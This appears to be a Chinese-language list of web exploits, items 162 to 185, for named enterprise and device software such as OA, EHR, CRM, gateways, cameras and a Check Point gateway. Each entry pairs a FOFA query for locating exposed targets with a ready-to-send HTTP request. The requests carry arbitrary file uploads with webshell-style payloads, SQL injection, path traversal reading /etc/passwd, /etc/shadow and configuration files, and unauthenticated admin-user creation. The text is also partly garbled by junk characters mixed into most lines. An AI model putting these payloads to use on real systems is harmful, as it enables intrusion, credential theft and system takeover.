8 T K. ?8 V# N162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传3 o" M. g4 Z% }/ F3 V3 ]9 y! u
FOFA: app="和丰山海-数字标牌"
0 }0 G* R" f& z! T$ VPOST /QH.aspx HTTP/1.1
/ S( w- v+ n K _5 C' LHost: x.x.x.x$ _1 \/ `& x2 ?/ p4 i# X/ v, l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
7 D* r% E" x' J+ w9 x2 BConnection: close/ b. d0 O4 M6 N0 _; P7 J7 @ @. P3 R5 @
Content-Length: 583
2 q8 |$ a$ E( rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey% f$ a+ }5 j# j- P3 P
Accept-Encoding: gzip& w; ] J% \$ @) y. ]0 f1 {
6 A' H1 T9 D* l9 S2 C
------WebKitFormBoundaryeegvclmyurlotuey
; C; W+ n9 A/ F3 `* q6 HContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"! s& Z; @5 x' P1 { q
Content-Type: application/octet-stream/ O" P/ E6 e+ l3 Y
# B8 ]9 f9 k0 r# C% w1 T9 t1 ~) m# M1 W<% response.write("ujidwqfuuqjalgkvrpqy") %>8 i8 g5 C+ q) K' Y) o2 {& F4 U# ~- U6 D
------WebKitFormBoundaryeegvclmyurlotuey
5 D1 w6 l, ?) F: k) TContent-Disposition: form-data; name="action"
. G) i1 b% L. V3 ^8 R- y. n: V( P, ^ K3 Z4 H! T( Y
upload
# S. a) _: q8 ]- G% G------WebKitFormBoundaryeegvclmyurlotuey
/ T, [6 v* W7 _8 @Content-Disposition: form-data; name="responderId"
6 s8 ]9 F0 O, |! k5 G- B: l) m0 n0 }, s$ `
ResourceNewResponder) p: \& D, X2 o1 ?0 h/ [
------WebKitFormBoundaryeegvclmyurlotuey
* s9 u* l1 Q0 _0 kContent-Disposition: form-data; name="remotePath"- d# X) T* P+ V$ H
$ L- I8 ~* }1 m+ T- w4 b. U! Z% c' J/opt/resources
' b: [4 S- j: u+ b------WebKitFormBoundaryeegvclmyurlotuey--
/ ~! f- ]2 P2 ]% z4 O8 l* N+ X2 o: ?& h
9 |. ?7 `" s: t# p' J# Uhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx" b4 r& h1 c, { p8 P+ p' g
& i" x1 h. I3 |; C9 C$ H163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
' h8 D8 D- z* L1 F5 l0 R3 eFOFA: icon_hash="-795291075"! E- S8 ^, ?% J+ _
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.13 c& N- i0 ] _5 ?0 U+ \5 M
Host: x.x.x.x
) n/ Y# Z' O. D8 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.366 H/ ~9 o/ W( q
Connection: close
) O, |. N: ~* Q0 g+ xContent-Length: 293
% A7 _" i1 ^6 }$ |0 }Accept: */*5 B* U* [' r7 E) W. P6 e
Accept-Encoding: gzip, deflate; Y5 ~7 E5 a/ ?' i& x2 |
Accept-Language: zh-CN,zh;q=0.9' h7 k8 \7 H5 Y7 J: v$ N) ~! U
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
- M1 t8 J' n3 c) a, V2 U$ s J3 Z5 _ O
------iiqvnofupvhdyrcoqyuujyetjvqgocod' `6 @& R! X; S7 P2 z1 S
Content-Disposition: form-data; name="name"
4 L. Q6 V. V" [) ]# _3 ~7 C$ ^0 H' N) z& o
1.php
3 E7 V& v3 C" k) g& j. |5 _------iiqvnofupvhdyrcoqyuujyetjvqgocod
$ o( q2 `, f5 X w2 SContent-Disposition: form-data; name="upfile"; filename="1.php"
4 A- s' [0 Q/ R% T( f, S. I) l) hContent-Type: image/jpeg. j) Q. r; E$ I. s. k
1 O5 a+ f. |7 [' A. a( urvjhvbhwwuooyiioxega
+ O. V7 k, H3 t1 r% g$ R------iiqvnofupvhdyrcoqyuujyetjvqgocod--
+ D9 l# t0 D2 \: f. d+ n
, }4 Y4 _; e9 v* A1 w+ d0 q+ i( v6 [. q4 x, ~
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
; X$ a3 E9 R; b8 wFOFA: title="智慧综合管理平台登入"! @+ |2 i4 y- V! y+ u1 f' m
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.12 z0 E( _6 m; D* n2 U& p& T% r9 Z
Host: x.x.x.x
" K# n# q$ P1 x! ^( Q" KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
& }: c9 ?. {* c1 \' N0 ?/ x6 i# u! g! eContent-Length: 288
* R% r- t% @! h2 K& HAccept: application/json, text/javascript, */*; q=0.01& W0 H( `; h+ @% |6 U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,- m5 S9 ~0 \% ?9 v
Connection: close
( m' m3 C' M5 s; ^- W1 }- p8 G; x- ]Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
4 Y2 |/ C6 F% H+ a5 t1 DX-Requested-With: XMLHttpRequest& U# z: u8 _& [* O4 C
Accept-Encoding: gzip& }' _! {' e5 c8 ^4 \& |, m0 R
" L" R6 H& ?4 X% o3 q* T0 @
------dqdaieopnozbkapjacdbdthlvtlyl! C. z0 c- u6 S" _+ x/ U0 k3 [1 K
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"% ^) A$ M* a m* M4 q
Content-Type: image/jpeg& S w8 a, |" y6 s, W
8 K4 @0 D2 }$ m<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
: N0 y3 b8 i/ X# d8 g------dqdaieopnozbkapjacdbdthlvtlyl--/ Z% {% g o( z5 A" M! m1 X
& l+ J# _+ j+ N$ K7 D5 @
h/ Y5 P( M8 k' t! r6 x- thttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx4 G5 T* y3 m" S
- H1 S1 r- _& I, y3 I& M1 n
165. OrangeHRM 3.3.3 SQL 注入
# A5 @' t0 R# ECVE-2024-36428
3 V* q0 U8 w: d8 z. Y, g( KFOFA: app="OrangeHRM-产品"
2 ~+ I7 v; T4 b' FURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))3 M. o0 v, {5 r
8 Q6 _/ z9 W6 ]2 U5 Y8 |
8 R' p8 V& `3 O. {
166. 中成科信票务管理平台SeatMapHandler SQL注入
! \( `& U! b7 vFOFA:body="技术支持:北京中成科信科技发展有限公司"
# _, A& z4 d* P! n) r+ l, B% JPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1. q1 T; F1 W b2 m5 F7 }
Host:
2 S' L" ~; Y. }) ]7 |) ]# r9 EPragma: no-cache
, ^4 ^2 ]7 e& f1 x3 H1 WCache-Control: no-cache
2 X; Z: ~1 [: o$ }! CUpgrade-Insecure-Requests: 1; o4 [# ]' M' f1 o6 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.369 Z+ u/ ^8 l9 o( S: h) P" J$ r, c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
n0 j3 z6 o0 K( cAccept-Encoding: gzip, deflate
* ^8 H5 q" o0 G! ~: R- PAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
* F7 a- B7 @) Z' W% ^Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
?8 ^( f. _* ]0 ]" r% X b# K) VConnection: close0 S2 K& m9 ^8 H$ [5 v
Content-Type: application/x-www-form-urlencoded
! j9 z7 i$ R) X4 h( _& M) ]! B# UContent-Length: 89 h8 P2 ~: m) @) y: I
' ]' O8 n( F8 b1 K" |
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE' \# H% Q' z7 A* d; z# W# t6 [/ a4 p4 R
/ @8 U' X7 @5 N3 D
5 F$ j9 O/ o' B" l167. 精益价值管理系统 DownLoad.aspx任意文件读取
& d: x( L% |2 t! TFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"% R" P0 ]7 B0 k$ ]/ e+ [% L
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1- |5 M5 [" u/ X( V- i; D
Host:8 f1 l7 `" a5 W% B% k2 e) p" |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# ?7 G' d6 T+ y: A- A+ [
Content-Type: application/x-www-form-urlencoded7 Q: m. G) N8 A$ ?. `
Accept-Encoding: gzip, deflate& @) W- m m @2 j
Accept: */*" H" u: l) A; ~; k
Connection: keep-alive. m n2 v; f* q' d* | O( V* U
% u# q% @2 N- p- Y, k- T B
8 M; h% D: R4 { a! X168. 宏景EHR OutputCode 任意文件读取
& h: K3 y0 u$ D; c3 H8 qFOFA:app="HJSOFT-HCM"
( U! K$ \5 z0 ]0 w1 ^$ A- X! SGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
1 _6 d4 i4 r" P" V& y* qHost: your-ip* v1 r' ~+ V/ M* E4 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
7 E4 S" q; R9 z% OContent-Type: application/x-www-form-urlencoded
* I. S5 _! F! e6 `; xConnection: close6 D" R! z6 P! D
4 j( A* }% Y4 x7 W2 V+ E5 k
, r$ S3 K0 P& }% A) M0 x' s# Q2 D& v s& ~* x M1 Y1 S2 ~+ W
169. 宏景EHR downlawbase SQL注入8 ]/ O% F; D& }) {* j6 K
FOFA:app="HJSOFT-HCM"
* W f' R" r* m9 lGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1' Q8 @8 ~! t! Q7 S2 o$ p: h5 Y, ?
Host: your-ip
; u! p' D7 _! |3 B+ n. tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( Q+ ]1 s: q5 W. G" ]2 N- K
Accept: */*
# W& j- h0 I9 M6 ]$ Y4 P. ?$ K( AAccept-Encoding: gzip, deflate) e/ T5 S1 X! ~2 @ K' x+ R
Connection: close
4 n s$ c9 ~) M
& O* P; ^1 Z) A9 n- j7 @7 W& [/ A7 z% A
. I6 C# T- C( g$ l4 _% H/ d3 r; N; G" p& K2 n. v
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
$ w' e/ r. H4 @3 ]. v6 BFOFA:body="/general/sys/hjaxmanage.js"+ |2 ]0 `" V' ]* P) f
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
/ v! b9 i; {( h- P* C/ R/ L5 J0 d' XHost: balalanengliang6 M* }$ p$ J/ H
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; N' n$ ~+ T* ]" U4 @7 eContent-Type: application/x-www-form-urlencoded
; s! q. l5 O$ n0 h+ |; v
# j: ^9 {6 K8 W; C+ vfilename=../webapps/ROOT/WEB-INF/web.xml
. Y5 F4 h+ a' o( T0 X4 j3 C# H% P2 ]
2 Z5 |( e% l' Y) E2 a6 d" T% O
. x$ J( K5 q: V; f9 D: Y" s171. 通天星CMSV6车载定位监控平台 SQL注入! x- U- I) u7 j9 @ L p
FOFA:body="/808gps/"% \8 [2 k( s0 h7 J
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
4 I! \1 W+ v* y; t/ mHost: your-ip+ l6 H/ K x. b$ r8 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0! {3 ~+ Z0 P' N b$ ~; E3 l
Accept: */*
, X; G7 \! ^/ cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; h: K: y& T" X" l4 E5 wAccept-Encoding: gzip, deflate* |- X" ]% y3 h' R8 {
Connection: close/ Z2 a' q0 {# X) ?
/ W% a* w) r! y* N1 Q, Q \2 s+ R
/ G/ n: ? ^3 D( S
! L% f; g$ y- g- z* q r172. DT-高清车牌识别摄像机任意文件读取
8 |# v' j* u0 A4 X5 {( u M/ L9 QFOFA:app="DT-高清车牌识别摄像机"
* E: A% o& y7 tGET /../../../../etc/passwd HTTP/1.1
9 l5 T! U$ t- l" C4 P" YHost: your-ip$ t1 b; `, x9 B" ~1 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* K* W+ O/ Z% B6 t3 [
Accept-Encoding: gzip, deflate
7 u6 t: y2 j% t \. S/ m! \. _Accept: */*
) c2 v* i& L8 e: A x4 ?- @Connection: keep-alive
! a% |- ^" ~4 H x" d/ D! m2 ~9 G J
# C8 |# A* ]8 c( ]1 O1 {$ j9 v; v, a, g( ?1 _0 O
173. Check Point 安全网关任意文件读取; S/ y, v% h6 D$ U0 X$ z {) B+ s
CVE-2024-24919- n$ m+ C. ~5 c2 t+ n; L5 j
FOFA:app="Check_Point-SSL-Network-Extender"- L- E1 ^5 R& I
POST /clients/MyCRL HTTP/1.1; l& k) s9 f: l- Q+ w
Host: your-ip. S8 H5 ]. z/ j3 x& x" v2 }4 t4 M: i u
Content-Type: application/x-www-form-urlencoded. W7 A" C6 D3 ^! E ?$ m: t
! z: C/ i% _+ e/ paCSHELL/../../../../../../../etc/shadow% |* _5 }7 W9 ?0 D$ c2 F! y
; t2 ^3 h/ G" Z# y
: S! I, d& v) b7 ^0 O3 t) j2 n8 _3 s8 _5 f
174. 金和OA C6 FileDownLoad.aspx 任意文件读取. W7 {" M. G) Y8 k
FOFA:app="金和网络-金和OA"
% v' ?- x2 f! x) R. QGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.11 E' S* q2 e) \4 \) j3 Q8 W
Host: your-ip
! J$ M: D. m0 k, ^1 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, R8 P! b/ S1 W; ^" F4 m7 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) S2 n# l' Y& E' O2 A* mAccept-Encoding: gzip, deflate, br# _6 p. h6 j' i- j' v+ E2 h- l
Accept-Language: zh-CN,zh;q=0.9# H/ y/ X5 t) k; w/ I
Connection: close
: }; D3 a* X' }$ s+ P3 H8 l
o% i+ q8 a; H
& B+ V; Q. U+ L% u2 |$ ~; u B2 c% B8 G4 I# P/ u( }4 Z: [, P
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
8 m8 ~" @! i0 ?: I5 f# h+ N& nFOFA:app="金和网络-金和OA"! Y' _. s$ N5 q, E3 N
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1: b. e3 X& L8 W$ G
Host:
* Q# j3 B/ O) x" U: m+ {User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# `/ P) A4 G" X5 w0 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 X4 H* g7 g: U, xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ x2 T- V* l4 r$ x3 H2 \Accept-Encoding: gzip, deflate; F& z- `# v6 P
Connection: close
/ w- J' _1 l$ Q+ I+ UUpgrade-Insecure-Requests: 1" C7 z" p( n/ d0 q( }: q- L
& D) L& {8 I8 [* F6 F( l, B
5 }. J- U4 F6 P2 Y/ b176. 电信网关配置管理系统 rewrite.php 文件上传
: `8 A2 x6 _8 o; k/ O7 Y% _8 MFOFA:body="img/login_bg3.png" && body="系统登录"" Q$ R; }( N5 e! Y( P# R( h) W
POST /manager/teletext/material/rewrite.php HTTP/1.1. j# M. |' |+ {8 n* P
Host: your-ip
9 h; f0 A1 y8 W% z7 n. i4 k: F# oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0% ^0 t9 k4 `7 k2 a
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
$ N4 n7 g* G4 B! c: ?" u" FConnection: close
7 Y- q+ W! g! p/ u/ a7 ~/ Y8 b( Z, b8 U% L3 h
------WebKitFormBoundaryOKldnDPT
6 l; o0 t% o9 n" AContent-Disposition: form-data; name="tmp_name"; filename="test.php"; Z" Y' F* D+ |" R6 W" O
Content-Type: image/png, D' z1 ^( I4 y
/ A) @3 u/ c0 y9 K<?php system("cat /etc/passwd");unlink(__FILE__);?>
7 O# s. H6 p/ Z0 b. K+ j n------WebKitFormBoundaryOKldnDPT# a! Y' O# R) z" j7 r
Content-Disposition: form-data; name="uploadtime"
; f3 T) ~1 i' D" e " C7 p* R9 P& O" g# |
$ f) R* o. j0 w- \* q' q------WebKitFormBoundaryOKldnDPT--
L# j0 f0 ^$ O2 W; d% D. a G) f- F5 H- X/ H" e' s3 _3 G* t
2 q& ^# L( M" M' c+ ~3 Y* e, U0 X$ y) |6 m1 f
177. H3C路由器敏感信息泄露
. \* k8 }5 J: y7 J4 R/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg! r- R* h: l `4 B/ l
/userLogin.asp/../actionpolicy_status/../M60.cfg
5 Y4 r3 t% Q/ y) S; O6 `/userLogin.asp/../actionpolicy_status/../GR8300.cfg( J$ E* J& n- e; j8 ^% y
/userLogin.asp/../actionpolicy_status/../GR5200.cfg* l% D. E- D3 O0 F, U+ y
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
( |# N. z; `& x! q3 z, R/userLogin.asp/../actionpolicy_status/../GR2200.cfg: e8 r4 ^ }3 N
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg1 v' c# X/ |4 P
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg2 U0 ?$ m$ F9 _, {
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
) O" ~: N: o# v! U/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg/ @" S( `2 C4 u
/userLogin.asp/../actionpolicy_status/../ER5200.cfg# I6 K9 q. Q& Z0 z* ?- H) C
/userLogin.asp/../actionpolicy_status/../ER5100.cfg: h9 s+ a9 v3 r/ o0 \( b$ x0 p
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
( n9 p) V" D2 M3 l0 Z" P- n# a( [ g/userLogin.asp/../actionpolicy_status/../ER3260.cfg
3 f8 Y/ V" Z4 T: L/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
3 B! }) M f1 e2 @: x$ ?6 n/userLogin.asp/../actionpolicy_status/../ER3200.cfg# D) @! e7 I; q( x* z) k8 t( J1 ^
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
8 I- |1 H8 a3 P* E/userLogin.asp/../actionpolicy_status/../ER3108G.cfg# q* K T( |* Z1 p a- a4 T& t6 v% a
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
% m# e* f& s: @8 q- K' o1 _/userLogin.asp/../actionpolicy_status/../ER3100.cfg w u& u$ y8 ^; B* Z) Q/ t
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
' J8 G& p% d! k' M9 D& l; M& A5 X" h. C3 g
, e1 \+ r' Y, j
178. H3C校园网自助服务系统-flexfileupload-任意文件上传* _# E4 W* u" d; R r/ l8 m2 _
FOFA:header="/selfservice"; {( z0 \7 ] g4 ^) n9 Q
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
j2 j1 [) z- R7 p; V( WHost:9 {% c6 k* L2 G$ U. A, H3 {8 U0 I; O( J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36! U% i; U' z+ [9 f6 L& a- u3 `
Content-Length: 252
) h& p" p& O9 C+ j, q, t* gAccept-Encoding: gzip, deflate. u! V- ?4 L4 [3 I) o
Connection: close
2 T5 K# P/ m* }/ b+ ^+ D3 e0 AContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l. C! i! |- f% y. s; j& \; n9 ~2 o
-----------------aqutkea7vvanpqy3rh2l% }# ?! G4 f8 S5 N! ]
Content-Disposition: form-data; name="12234.txt"; filename="12234"
6 l$ y% Z) x8 h2 G$ ~Content-Type: application/octet-stream
# N& ^! f# Y2 M) ?# ZContent-Length: 255
: m9 I( T% |1 b; |4 c- f/ i1 O/ l
12234
6 s- O8 u6 [* E+ {-----------------aqutkea7vvanpqy3rh2l--7 {& w- V% w& b8 B
2 }% X/ F. X0 Z; r2 B" p
$ A; W4 w3 A4 ]! U+ UGET /imc/primepush/%2e%2e/flex/12234.txt! N4 c( F- l- F1 J- F
! w$ P. B4 ^5 E" ?
% N1 `: g2 T4 {* l" x0 R% Z
179. 建文工程管理系统存在任意文件读取# m" p0 V7 _: N3 {9 O4 R5 y& e
POST /Common/DownLoad2.aspx HTTP/1.1( B' h9 U2 b8 x* Z) R3 Z9 I0 _. G7 K
Host: {{Hostname}}- G' R, ?" `- W: E- W- Y
Content-Type: application/x-www-form-urlencoded) u6 L& ?3 Q5 }( x- Q
User-Agent: Mozilla/5.0
, f( @+ h5 O Q6 K) h X7 z
/ j7 Q% k" u+ Q2 Y$ Z+ upath=../log4net.config&Name=
- M$ E+ g$ [3 e1 U# _
0 V8 X3 q& D5 |; j
' P# c# L, Z; ]; _180. 帮管客 CRM jiliyu SQL注入, v+ e6 |6 L% w/ D1 q7 T
FOFA:app="帮管客-CRM"
2 G3 a" [9 n" I5 T. nGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
3 q' {5 p7 B" NHost: your-ip
* Q" R) A, h; A- LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. c# D2 r: c; Y8 d+ g1 ]3 }, g) |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* f g* L0 ~: A: Q
Accept-Encoding: gzip, deflate9 C- ]8 k% L3 h- k1 y% E; l
Accept-Language: zh-CN,zh;q=0.9
1 J3 G8 v+ K6 i( z& ~$ r6 @$ hConnection: close
f4 x0 J8 c, W5 h9 G6 ^$ K) l+ {9 `
; x2 P2 c" p/ f. V; r6 M
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
; S6 ]6 g3 a3 m S4 Q+ YFOFA:"PDCA/js/_publicCom.js"
. E& m1 k* b8 [- U2 Y4 `0 [POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.11 s9 Y Z+ E5 K; R8 S4 m/ B
Host: your-ip. l5 e5 @7 y' E; J( P# x6 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36: G) R/ @2 [: j7 P" P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. h+ [( w! k! D" s1 K/ H
Accept-Encoding: gzip, deflate, br2 a/ y1 `2 ?4 T
Accept-Language: zh-CN,zh;q=0.99 i8 e6 Q3 q( y, F
Connection: close9 r Q+ G; ~% ] @. @
Content-Type: application/x-www-form-urlencoded8 w, @3 Q2 ~' j7 {6 ]
, A" E% S* o2 z& S5 c/ d4 W v% N( g/ u, V) j" C
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
$ b7 [' i# L$ m1 k6 Q1 k9 t4 ]) r2 a$ t: Q: p2 A' e
7 N5 v9 _" B2 j$ ] k9 R+ w182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
, C1 j, Q7 C7 `FOFA:"PDCA/js/_publicCom.js"
7 I3 r ~7 }6 cPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
7 u' }2 P2 |4 L" x$ Z3 K- P& [! Z- mHost: your-ip
7 J1 A1 H, v N( E% H- H2 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.363 @7 U+ i; x$ H+ o) s7 W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- {3 l3 ^$ w5 A6 g6 FAccept-Encoding: gzip, deflate, br) S% ]* q+ L) L0 @) D8 z3 R- B
Accept-Language: zh-CN,zh;q=0.91 t. J8 V- U6 H4 ]2 H6 w1 f
Connection: close
* j* `% ~7 E/ Z, P2 Q2 Y) [Content-Type: application/x-www-form-urlencoded! s( E6 l! E0 J$ @
; O6 ~+ S2 i9 E1 U
, t9 E- V* Z0 T2 Cusername=test1234&pwd=test1234&savedays=1: s/ s$ h8 @* O$ z% d" C" A) I5 V
! ?' T1 j& b; L K* m' m7 j2 }5 G. O. H- Q0 B+ G" H
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入# r' k, X7 P0 L5 Q0 c' R
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"8 C! Z! ]' [( e) `
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
6 J3 Z4 U/ x3 Y$ k+ A$ ZHost: your-ip. V4 r8 R1 b- \1 d
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
9 g. Y+ f* L) m f2 v; KAccept-Charset: utf-8
/ q1 a- K6 l- D2 ~. OAccept-Encoding: gzip, deflate
( N4 k* H& }3 ^# d2 T8 d0 jConnection: close# ^" J/ s m) g$ u2 ]/ d$ {/ K* Z& [' }
' M4 H: H( ^8 o" O$ G% @" r# O4 b
& A) \- ?8 P* P# U0 ]) ?$ d L184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加# A/ a+ J3 w; r B* j0 I
FOFA:server="SunFull-Webs"2 Y6 J$ H& P3 L. _/ \, X5 t. P' w' |8 L
POST /soap/AddUser HTTP/1.1
, h) [9 v7 e( |5 lHost: your-ip* \: T5 Y, A; i1 N
Accept-Encoding: gzip, deflate/ g" l' v. ^. L, X! l% e4 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
; \3 T! ?$ r7 v4 Z" g; y; QAccept: application/xml, text/xml, */*; q=0.01* {$ ~8 P Y: M
Content-Type: text/xml; charset=utf-89 }. q- a6 c3 w4 i: B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' J+ S5 n' Z) k1 ^4 d' a2 oX-Requested-With: XMLHttpRequest
! j5 c- u3 M* F3 X- q0 z- T+ R1 m, p+ R' c
/ [9 Z# ?& ~, K+ ^# r( _ k$ S1 s0 H
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56') I4 j8 y5 d1 L9 _$ u( d
4 v8 ~% Q3 a$ d' t4 Z$ b! r- b# ~0 K. j- ~ o. A0 ^/ e6 }4 K
185. 瑞友天翼应用虚拟化系统SQL注入: c. V: e7 K$ e* ]. N1 J
version < 7.0.5.1
3 Q: G) h* k5 g$ D3 E0 V& yFOFA:app="REALOR-天翼应用虚拟化系统"
